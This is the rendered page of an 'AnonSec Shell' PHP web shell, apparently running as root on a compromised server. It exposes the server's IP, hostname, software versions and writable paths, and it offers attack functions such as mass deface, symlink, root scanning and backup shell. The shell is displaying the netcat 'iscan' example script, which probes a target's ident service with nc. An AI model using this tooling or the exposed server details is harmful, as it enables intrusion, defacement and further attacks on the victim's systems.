AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/share/doc/netcat-openbsd/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/thread-self/root/usr/share/doc/netcat-openbsd/examples/iscan
#! /bin/sh
## duplicate DaveG's ident-scan thingie using netcat.  Oooh, he'll be pissed.
## args: target port [port port port ...]
## hose stdout *and* stderr together.
##
## advantages: runs slower than ident-scan, giving remote inetd less cause
## for alarm, and only hits the few known daemon ports you specify.
## disadvantages: requires numeric-only port args, the output sleazitude,
## and won't work for r-services when coming from high source ports.

case "${2}" in
  "" ) echo needs HOST and at least one PORT ; exit 1 ;;
esac

# ping 'em once and see if they *are* running identd
nc -z -w 9 "$1" 113 || { echo "oops, $1 isn't running identd" ; exit 0 ; }

# generate a randomish base port
RP=`expr $$ % 999 + 31337`

TRG="$1"
shift

while test "$1" ; do
  nc -v -w 8 -p ${RP} "$TRG" ${1} < /dev/null > /dev/null &
  PROC=$!
  sleep 3
  echo "${1},${RP}" | nc -w 4 -r "$TRG" 113 2>&1
  sleep 2
# does this look like a lamer script or what...
  kill -HUP $PROC
  RP=`expr ${RP} + 1`
  shift
done


Anon7 - 2022
AnonSec Team